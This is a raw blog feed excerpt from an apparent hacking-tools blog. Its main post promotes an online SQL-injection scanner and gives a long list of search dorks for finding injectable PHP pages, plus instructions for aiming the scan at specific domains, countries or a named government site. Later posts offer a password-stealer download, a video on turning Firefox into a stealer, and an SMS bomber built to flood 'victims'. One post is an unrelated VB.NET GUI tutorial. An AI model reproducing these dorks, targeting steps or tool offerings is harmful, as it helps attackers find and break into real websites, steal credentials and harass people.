&lt;span style="text-decoration: underline;"&gt;Private Online Sqli Scanner V2  Source Code edited By XuhaiD&lt;span style="color: darkgreen;"&gt;  (Only Vulnerable Sites ) &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://www.sqlscanner.info/v2.php" target="_blank"&gt;*Click here to Access*&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="text-decoration: underline;"&gt;Public Online Sqli Scanner V2  Source Code edited By XuhaiD&lt;span style="color: darkgreen;"&gt;  (Only Vulnerable Sites ) &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://sqlscanner.info/Public-Sql-Scanner/Publicv2.php" target="_blank"&gt;*Click here to Access*&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Ok Public Version Will Log Your Links Which you'll Scan In Our Scanner  For Those who hate scanning websites For more info Check here : &lt;a href="http://sqlscanner.info/Public-Sql-Scanner/What-is-this.index.html" target="_blank"&gt;http://sqlscanner.info/Public-Sql-Scanne...index.html&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Public Scanner Version 1 Logger here : &lt;a href="http://sqlscanner.info/Public-Sql-Scanner/v1log.txt" target="_blank"&gt;http://sqlscanner.info/Public-Sql-Scanner/v1log.txt&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Public Scanner Version 2 Logger here : &lt;a href="http://sqlscanner.info/Public-Sql-Scanner/v2log.txt" target="_blank"&gt;http://sqlscanner.info/Public-Sql-Scanner/v2log.txt&lt;/a&gt; &lt;br /&gt;
&lt;br /&gt;
After Scanning You can Now easily Remove Links with one Click From here : &lt;a href="http://sqlscanner.info/Repeatremover.html" target="_blank"&gt;http://sqlscanner.info/Repeatremover.html&lt;/a&gt; &lt;br /&gt;
&lt;br /&gt;
About Version 2 If you Guys Dnt know This will Scan Only Vulnerable Sites &lt;br /&gt;
Example : &lt;br /&gt;
&lt;img alt="[Image: sql.GIF]" border="0" src="http://www.sqlscanner.info/sql.GIF" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: maroon;"&gt;Dork List&lt;/span&gt;  : &lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class="codeblock"&gt; &lt;div class="title"&gt;Code:&lt;br /&gt;
&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code&gt;inurl:php?=id+gov&lt;br /&gt;
inurl:index.php?id=&lt;br /&gt;
inurl:trainers.php?id=&lt;br /&gt;
inurl:buy.php?category=&lt;br /&gt;
inurl:article.php?ID=&lt;br /&gt;
inurl:play_old.php?id=&lt;br /&gt;
inurl:declaration_more.php?decl_id=&lt;br /&gt;
inurl:pageid=&lt;br /&gt;
inurl:games.php?id=&lt;br /&gt;
inurl:page.php?file=&lt;br /&gt;
inurl:newsDetail.php?id=&lt;br /&gt;
inurl:gallery.php?id=&lt;br /&gt;
inurl:article.php?id=&lt;br /&gt;
inurl:show.php?id=&lt;br /&gt;
inurl:staff_id=&lt;br /&gt;
inurl:newsitem.php?num=&lt;br /&gt;
inurl:readnews.php?id=&lt;br /&gt;
inurl:top10.php?cat=&lt;br /&gt;
inurl:historialeer.php?num=&lt;br /&gt;
inurl:reagir.php?num=&lt;br /&gt;
inurl:Stray-Questions-View.php?num=&lt;br /&gt;
inurl:forum_bds.php?num=&lt;br /&gt;
inurl:game.php?id=&lt;br /&gt;
inurl:view_product.php?id=&lt;br /&gt;
inurl:newsone.php?id=&lt;br /&gt;
inurl:sw_comment.php?id=&lt;br /&gt;
inurl:news.php?id=&lt;br /&gt;
inurl:avd_start.php?avd=&lt;br /&gt;
inurl:event.php?id=&lt;br /&gt;
inurl:product-item.php?id=&lt;br /&gt;
inurl:sql.php?id=&lt;br /&gt;
inurl:news_view.php?id=&lt;br /&gt;
inurl:select_biblio.php?id=&lt;br /&gt;
inurl:humor.php?id=&lt;br /&gt;
inurl:aboutbook.php?id=&lt;br /&gt;
inurl:ogl_inet.php?ogl_id=&lt;br /&gt;
inurl:fiche_spectacle.php?id=&lt;br /&gt;
inurl:communique_detail.php?id=&lt;br /&gt;
inurl:sem.php3?id=&lt;br /&gt;
inurl:kategorie.php4?id=&lt;br /&gt;
inurl:news.php?id=&lt;br /&gt;
inurl:index.php?id=&lt;br /&gt;
inurl:faq2.php?id=&lt;br /&gt;
inurl:show_an.php?id=&lt;br /&gt;
inurl:preview.php?id=&lt;br /&gt;
inurl:loadpsb.php?id=&lt;br /&gt;
inurl:opinions.php?id=&lt;br /&gt;
inurl:spr.php?id=&lt;br /&gt;
inurl:pages.php?id=&lt;br /&gt;
inurl:announce.php?id=&lt;br /&gt;
inurl:clanek.php4?id=&lt;br /&gt;
inurl:participant.php?id=&lt;br /&gt;
inurl:download.php?id=&lt;br /&gt;
inurl:main.php?id=&lt;br /&gt;
inurl:review.php?id=&lt;br /&gt;
inurl:chappies.php?id=&lt;br /&gt;
inurl:read.php?id=&lt;br /&gt;
inurl:prod_detail.php?id=&lt;br /&gt;
inurl:viewphoto.php?id=&lt;br /&gt;
inurl:article.php?id=&lt;br /&gt;
inurl:person.php?id=&lt;br /&gt;
inurl:productinfo.php?id=&lt;br /&gt;
inurl:showimg.php?id=&lt;br /&gt;
inurl:view.php?id=&lt;br /&gt;
inurl:website.php?id=&lt;br /&gt;
inurl:hosting_info.php?id=&lt;br /&gt;
inurl:gallery.php?id=&lt;br /&gt;
inurl:rub.php?idr=&lt;br /&gt;
inurl:view_faq.php?id=&lt;br /&gt;
inurl:artikelinfo.php?id=&lt;br /&gt;
inurl:detail.php?ID=&lt;br /&gt;
inurl:index.php?=&lt;br /&gt;
inurl:profile_view.php?id=&lt;br /&gt;
inurl:category.php?id=&lt;br /&gt;
inurl:publications.php?id=&lt;br /&gt;
inurl:fellows.php?id=&lt;br /&gt;
inurl:downloads_info.php?id=&lt;br /&gt;
inurl:prod_info.php?id=&lt;br /&gt;
inurl:shop.php?do=part&amp;amp;id=&lt;br /&gt;
inurl:productinfo.php?id=&lt;br /&gt;
inurl:collectionitem.php?id=&lt;br /&gt;
inurl:band_info.php?id=&lt;br /&gt;
inurl:product.php?id=&lt;br /&gt;
inurl:releases.php?id=&lt;br /&gt;
inurl:ray.php?id=&lt;br /&gt;
inurl:produit.php?id=&lt;br /&gt;
inurl:pop.php?id=&lt;br /&gt;
inurl:shopping.php?id=&lt;br /&gt;
inurl:productdetail.php?id=&lt;br /&gt;
inurl:post.php?id=&lt;br /&gt;
inurl:viewshowdetail.php?id=&lt;br /&gt;
inurl:clubpage.php?id=&lt;br /&gt;
inurl:memberInfo.php?id=&lt;br /&gt;
inurl:section.php?id=&lt;br /&gt;
inurl:theme.php?id=&lt;br /&gt;
inurl:page.php?id=&lt;br /&gt;
inurl:shredder-categories.php?id=&lt;br /&gt;
inurl:tradeCategory.php?id=&lt;br /&gt;
inurl:product_ranges_view.php?ID=&lt;br /&gt;
inurl:shop_category.php?id=&lt;br /&gt;
inurl:tran******.php?id=&lt;br /&gt;
inurl:channel_id=&lt;br /&gt;
inurl:item_id=&lt;br /&gt;
inurl:newsid=&lt;br /&gt;
inurl:trainers.php?id=&lt;br /&gt;
inurl:news-full.php?id=&lt;br /&gt;
inurl:news_display.php?getid=&lt;br /&gt;
inurl:index2.php?option=&lt;br /&gt;
inurl:readnews.php?id=&lt;br /&gt;
inurl:top10.php?cat=&lt;br /&gt;
inurl:newsone.php?id=&lt;br /&gt;
inurl:event.php?id=&lt;br /&gt;
inurl:product-item.php?id=&lt;br /&gt;
inurl:sql.php?id=&lt;br /&gt;
inurl:aboutbook.php?id=&lt;br /&gt;
inurl:preview.php?id=&lt;br /&gt;
inurl:loadpsb.php?id=&lt;br /&gt;
inurl:pages.php?id=&lt;br /&gt;
inurl:material.php?id=&lt;br /&gt;
inurl:clanek.php4?id=&lt;br /&gt;
inurl:announce.php?id=&lt;br /&gt;
inurl:chappies.php?id=&lt;br /&gt;
inurl:read.php?id=&lt;br /&gt;
inurl:viewapp.php?id=&lt;br /&gt;
inurl:viewphoto.php?id=&lt;br /&gt;
inurl:rub.php?idr=&lt;br /&gt;
inurl:galeri_info.php?l=&lt;br /&gt;
inurl:review.php?id=&lt;br /&gt;
inurl:iniziativa.php?in=&lt;br /&gt;
inurl:curriculum.php?id=&lt;br /&gt;
inurl:labels.php?id=&lt;br /&gt;
inurl:story.php?id=&lt;br /&gt;
inurl:look.php?ID=&lt;br /&gt;
inurl:newsone.php?id=&lt;br /&gt;
inurl:aboutbook.php?id=&lt;br /&gt;
inurl:material.php?id=&lt;br /&gt;
inurl:opinions.php?id=&lt;br /&gt;
inurl:announce.php?id=&lt;br /&gt;
inurl:rub.php?idr=&lt;br /&gt;
inurl:galeri_info.php?l=&lt;br /&gt;
inurl:tekst.php?idt=&lt;br /&gt;
inurl:newscat.php?id=&lt;br /&gt;
inurl:newsticker_info.php?idn=&lt;br /&gt;
inurl:rubrika.php?idr=&lt;br /&gt;
inurl:rubp.php?idr=&lt;br /&gt;
inurl:offer.php?idf=&lt;br /&gt;
inurl:art.php?idm=&lt;br /&gt;
inurl:title.php?id=&lt;br /&gt;
inurl:recruit_details.php?id=&lt;br /&gt;
inurl:index.php?cPath=&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
&lt;blockquote&gt;&lt;cite&gt;Quote:&lt;/cite&gt;Use online sqli scanner (scan specific: websites/domains/countries)&lt;/blockquote&gt;&lt;br /&gt;
&lt;div class="codeblock"&gt; &lt;div class="title"&gt;Code:&lt;br /&gt;
&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code&gt;www.sqlscanner.info&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
&lt;blockquote&gt;&lt;cite&gt;Quote:&lt;/cite&gt;How to: Scan specific websites&lt;br /&gt;
&lt;br /&gt;
Just use it like this:&lt;br /&gt;
inurl:php?id=+site:[domain of website]&lt;br /&gt;
&lt;br /&gt;
you can either change it like:&lt;br /&gt;
inurl:php?page=+site:[domain of website]&lt;br /&gt;
inurl:php?type=+site:[domain of website]&lt;br /&gt;
&lt;br /&gt;
If by any chance it fail's just put inurl or allinurl instead of site, like this:&lt;br /&gt;
inurl:php?id=+inurl:[domain of website]&lt;br /&gt;
inurl:php?id=+allinurl:[domain of website]&lt;br /&gt;
&lt;br /&gt;
Examples:&lt;br /&gt;
&lt;br /&gt;
If you want to scan specif countries websites:&lt;br /&gt;
for example .pt websites:&lt;br /&gt;
inurl:php?type=+site:.pt&lt;br /&gt;
or .br:&lt;br /&gt;
inurl:php?type=+site:.br&lt;br /&gt;
&lt;br /&gt;
If you want to scan: &lt;a href="http://www.thurrock.gov.uk/" target="_blank"&gt;http://www.thurrock.gov.uk&lt;/a&gt;&lt;br /&gt;
use: inurl:php?=id+site:thurrock.gov.uk&lt;/blockquote&gt;&lt;br /&gt;
If You Face Any Kinda Problem Can Contact Me Online Here&lt;br /&gt;
: &lt;a href="http://sqlscanner.info/livezilla/chat.php" target="_blank"&gt;&lt;img alt="[Image: image.php?id=01]" border="0" src="http://sqlscanner.info/livezilla/image.php?id=01" /&gt;&lt;/a&gt;&lt;br /&gt;
Or reply to this thread - If you find Scanner stopped Working Lemme know  i have another server i will release the link of that server&lt;br /&gt;
&lt;br /&gt;
Private Online Scanner V1 Credits : R3miCk&lt;br /&gt;
&lt;br /&gt;
Private Online Scanner V2 Credits : R3miCk ( Edited By me )&lt;br /&gt;
&lt;br /&gt;
Public Online Scanner V1 Credits : R3miCk ( Edited By Me )&lt;br /&gt;
&lt;br /&gt;
Public Online Scanner V2 Credits : R3miCk ( Edited By me )&lt;br /&gt;
&lt;br /&gt;
Remove Duplicate : By Me ( XuhaiD ) &lt;br /&gt;
&lt;br /&gt;
Scan Specific Website Domain Credits : Hack.addict.pt&lt;br /&gt;
&lt;br /&gt;
sqlscanner.info Index Page Credit's : th3-Outlaw Tools&lt;br /&gt;
&lt;br /&gt;
Enjoy&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4252702633268366782-9202956503678869896?l=sql-injection-tools.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/bEmUmc3_4vTlYhV1ZORmzIbnQCk/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/bEmUmc3_4vTlYhV1ZORmzIbnQCk/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/bEmUmc3_4vTlYhV1ZORmzIbnQCk/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/bEmUmc3_4vTlYhV1ZORmzIbnQCk/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~4/GTmsdAyPw6A" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sql-injection-tools.blogspot.com/feeds/9202956503678869896/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sql-injection-tools.blogspot.com/2011/04/xuhaid-sqli-scanner-v3.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/9202956503678869896?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/9202956503678869896?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~3/GTmsdAyPw6A/xuhaid-sqli-scanner-v3.html" title="xuhaid SQLi Scanner V3" /><author><name>CardingPower</name><uri>http://www.blogger.com/profile/17368275144743699486</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>1</thr:total><feedburner:origLink>http://sql-injection-tools.blogspot.com/2011/04/xuhaid-sqli-scanner-v3.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0IMQHw6eCp7ImA9WhZTGUk.&quot;"><id>tag:blogger.com,1999:blog-4252702633268366782.post-4287396747373753108</id><published>2011-03-23T23:52:00.001-07:00</published><updated>2011-03-23T23:53:01.210-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-23T23:53:01.210-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="vb.net" /><title>[VB.NET]How to make a nice GUI!</title><content type="html">&lt;div style="text-align: center;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="color: purple;"&gt;&lt;span style="text-decoration: underline;"&gt;&lt;span style="font-weight: bold;"&gt;How to make a nice GUI!&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
Download SkinCrafter Light: &lt;a href="http://www.skincrafter.com/download" target="_blank"&gt;Here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Open Visual Basic.&lt;br /&gt;
Go to toolbox at "Data" and right click "Choose Items..."&lt;br /&gt;
&lt;br /&gt;
Click Browse... and select C:\Program  Files\SkinCrafter3\skincrafter.net-vs2005 light\SkinCrafter.Net  VS2005\skincrafter.net-vs2005_light.dll.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="[Image: 37498571.png]" border="0" src="http://img411.imageshack.us/img411/9027/37498571.png" /&gt;&lt;br /&gt;
&lt;br /&gt;
Press OK.&lt;br /&gt;
&lt;br /&gt;
Now it will be here:&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="[Image: dataq.png]" border="0" src="http://img31.imageshack.us/img31/6391/dataq.png" /&gt;&lt;br /&gt;
&lt;br /&gt;
Drag it to your form.&lt;br /&gt;
&lt;br /&gt;
Go to its properties and select skin from here:&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="[Image: 12804104.jpg]" border="0" src="http://img638.imageshack.us/img638/7629/12804104.jpg" /&gt;&lt;br /&gt;
&lt;br /&gt;
I always use Black_Pearl_st to my programs :D&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="[Image: 77122036.png]" border="0" src="http://img203.imageshack.us/img203/7950/77122036.png" /&gt;&lt;br /&gt;
&lt;br /&gt;
Hope I helped you with this tutorial! :cool:&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4252702633268366782-4287396747373753108?l=sql-injection-tools.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/Tw_Ov__2zqZuVvo8gr9XlGUSO5s/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Tw_Ov__2zqZuVvo8gr9XlGUSO5s/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/Tw_Ov__2zqZuVvo8gr9XlGUSO5s/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Tw_Ov__2zqZuVvo8gr9XlGUSO5s/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~4/E2RSyiBcih4" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sql-injection-tools.blogspot.com/feeds/4287396747373753108/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sql-injection-tools.blogspot.com/2011/03/vbnethow-to-make-nice-gui.html#comment-form" title="2 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/4287396747373753108?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/4287396747373753108?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~3/E2RSyiBcih4/vbnethow-to-make-nice-gui.html" title="[VB.NET]How to make a nice GUI!" /><author><name>CardingPower</name><uri>http://www.blogger.com/profile/17368275144743699486</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>2</thr:total><feedburner:origLink>http://sql-injection-tools.blogspot.com/2011/03/vbnethow-to-make-nice-gui.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0IERHk7eSp7ImA9WhZTGUk.&quot;"><id>tag:blogger.com,1999:blog-4252702633268366782.post-7098583469397419763</id><published>2011-03-23T23:51:00.001-07:00</published><updated>2011-03-23T23:51:45.701-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-23T23:51:45.701-07:00</app:edited><title>HD VIDEO TUTORIAL; How to watch old youtube videos in High Quality and more.</title><content type="html">&lt;object width="640" height="390"&gt;&lt;param name="movie" value="http://www.youtube.com/v/667HwmO9RSQ&amp;hl=en_US&amp;feature=player_embedded&amp;version=3"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowScriptAccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/667HwmO9RSQ&amp;hl=en_US&amp;feature=player_embedded&amp;version=3" type="application/x-shockwave-flash" allowfullscreen="true" allowScriptAccess="always" width="640" height="390"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4252702633268366782-7098583469397419763?l=sql-injection-tools.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/K-u-EbMTqGcgWmNoXN873kKMs3w/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/K-u-EbMTqGcgWmNoXN873kKMs3w/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/K-u-EbMTqGcgWmNoXN873kKMs3w/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/K-u-EbMTqGcgWmNoXN873kKMs3w/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~4/z67_MKA8New" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sql-injection-tools.blogspot.com/feeds/7098583469397419763/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sql-injection-tools.blogspot.com/2011/03/hd-video-tutorial-how-to-watch-old.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/7098583469397419763?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/7098583469397419763?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~3/z67_MKA8New/hd-video-tutorial-how-to-watch-old.html" title="HD VIDEO TUTORIAL; How to watch old youtube videos in High Quality and more." /><author><name>CardingPower</name><uri>http://www.blogger.com/profile/17368275144743699486</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total><feedburner:origLink>http://sql-injection-tools.blogspot.com/2011/03/hd-video-tutorial-how-to-watch-old.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0cCQX06cSp7ImA9WhZTGUk.&quot;"><id>tag:blogger.com,1999:blog-4252702633268366782.post-6162907908911659565</id><published>2011-03-23T23:42:00.001-07:00</published><updated>2011-03-23T23:44:20.319-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-23T23:44:20.319-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Password Stealers" /><title>iStealer 6.3</title><content type="html">&lt;img alt="[Image: istealer1.png]" border="0" src="http://img526.imageshack.us/img526/942/istealer1.png" /&gt;&lt;br /&gt;
&lt;br /&gt;
Download:&lt;br /&gt;
&lt;a href="http://uppit.com/3yn0x9b2jf73/iStealer_6.3_Legends.rar" target="_blank"&gt;http://uppit.com/3yn0x9b2jf73/iStealer_6.3_Legends.rar&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Virus Scan: &lt;a href="http://vscan.novirusthanks.org/analysis/41547f39464e8f6feb21410634cd3d07/aXN0ZWFsZXItNi0zLWxlZ2VuZHMtcmFy/" target="_blank"&gt;http://vscan.novirusthanks.org/analysis/...uZHMtcmFy/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Leaked By Blair&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4252702633268366782-6162907908911659565?l=sql-injection-tools.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/YrVZ6cJDcIowMMc3HUNgPFQXCac/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/YrVZ6cJDcIowMMc3HUNgPFQXCac/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/YrVZ6cJDcIowMMc3HUNgPFQXCac/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/YrVZ6cJDcIowMMc3HUNgPFQXCac/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~4/in0IN_0Chf8" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sql-injection-tools.blogspot.com/feeds/6162907908911659565/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sql-injection-tools.blogspot.com/2011/03/istealer-63.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/6162907908911659565?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/6162907908911659565?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~3/in0IN_0Chf8/istealer-63.html" title="iStealer 6.3" /><author><name>CardingPower</name><uri>http://www.blogger.com/profile/17368275144743699486</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>1</thr:total><feedburner:origLink>http://sql-injection-tools.blogspot.com/2011/03/istealer-63.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkQEQX4_cSp7ImA9WhZTGUk.&quot;"><id>tag:blogger.com,1999:blog-4252702633268366782.post-7832149861418282026</id><published>2011-03-23T23:31:00.001-07:00</published><updated>2011-03-23T23:31:40.049-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-23T23:31:40.049-07:00</app:edited><title>Turn Your Firefox into a Stealer Without any Software-Video {TuT}*</title><content type="html">&lt;object width="640" height="390"&gt;&lt;param name="movie" value="http://www.youtube.com/v/m65l4DQMEgk&amp;hl=en_US&amp;feature=player_embedded&amp;version=3"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowScriptAccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/m65l4DQMEgk&amp;hl=en_US&amp;feature=player_embedded&amp;version=3" type="application/x-shockwave-flash" allowfullscreen="true" allowScriptAccess="always" width="640" height="390"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4252702633268366782-7832149861418282026?l=sql-injection-tools.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/t42Mg4Zy02_Fczp_4YCvUMjYzNU/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/t42Mg4Zy02_Fczp_4YCvUMjYzNU/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/t42Mg4Zy02_Fczp_4YCvUMjYzNU/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/t42Mg4Zy02_Fczp_4YCvUMjYzNU/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~4/KcFS1a5_CkU" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sql-injection-tools.blogspot.com/feeds/7832149861418282026/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sql-injection-tools.blogspot.com/2011/03/turn-your-firefox-into-stealer-without.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/7832149861418282026?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/7832149861418282026?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~3/KcFS1a5_CkU/turn-your-firefox-into-stealer-without.html" title="Turn Your Firefox into a Stealer Without any Software-Video {TuT}*" /><author><name>CardingPower</name><uri>http://www.blogger.com/profile/17368275144743699486</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>1</thr:total><feedburner:origLink>http://sql-injection-tools.blogspot.com/2011/03/turn-your-firefox-into-stealer-without.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUMARns9fCp7ImA9WhZTGUk.&quot;"><id>tag:blogger.com,1999:blog-4252702633268366782.post-1878145738751088741</id><published>2011-03-23T23:17:00.001-07:00</published><updated>2011-03-23T23:17:27.564-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-23T23:17:27.564-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="sms" /><title>Beaver's SMS Bomber Pro</title><content type="html">Features Include:&lt;br /&gt;
Full Feature List:&lt;br /&gt;
Custom SMTP Server (Make Sure You Type It Right)&lt;br /&gt;
Custom Carrier Gateway (If Your Victims Gateway Is Not In The Large List You May Find And Enter it Yourself)&lt;br /&gt;
Custom Number Of SMS To Send (Finally Have Where You Can Enter Any Amount To Send)&lt;br /&gt;
Save/Load Settings (Will Save Everything You Enter In The Fields, Restarting Your Computer Will Lose The Saved Settings)&lt;br /&gt;
Fixed XP GUI Issues&lt;br /&gt;
Stop Bombing At Any Time&lt;br /&gt;
Watch The Number Of SMS Sent In The Title Bar&lt;br /&gt;
No Longer Freezes While Sending&lt;br /&gt;
Added A Recent slave's Box Where You Can Select An Entry And Right-Click It To Bomb It Again Or Delete It From The List&lt;br /&gt;
Save/Load Recent Victims List&lt;br /&gt;
&lt;br /&gt;
GMail Is The Default SMTP Server That Is Used Which Has A Limit On The Number That Can Be Sent&lt;br /&gt;
Has A Lot Of Carriers Already Pre-Entered For You.&lt;br /&gt;
SMS Looks Like&lt;br /&gt;
&lt;br /&gt;
